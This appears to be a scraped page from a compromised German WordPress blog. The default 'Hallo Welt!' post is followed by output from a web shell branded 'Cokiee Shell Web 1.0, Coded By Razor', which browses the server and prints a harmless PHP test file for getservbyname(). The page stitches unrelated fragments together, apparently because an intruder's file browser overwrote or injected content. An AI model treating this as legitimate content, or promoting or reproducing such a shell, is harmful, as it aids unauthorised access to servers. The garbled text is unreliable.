Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/general_functions/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/general_functions/getservbyname_variation11.phpt |
--TEST-- Test function getservbyname() by substituting argument 2 with float values. --FILE-- <?php echo "*** Test substituting argument 2 with float values ***\n"; $service = "www"; $variation_array = array( 'float 10.5' => 10.5, 'float -10.5' => -10.5, 'float 12.3456789000e10' => 12.3456789000e10, 'float -12.3456789000e10' => -12.3456789000e10, 'float .5' => .5, ); foreach ( $variation_array as $var ) { var_dump(getservbyname( $service, $var ) ); } ?> --EXPECTF-- *** Test substituting argument 2 with float values *** bool(false) bool(false) bool(false) bool(false) bool(false)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare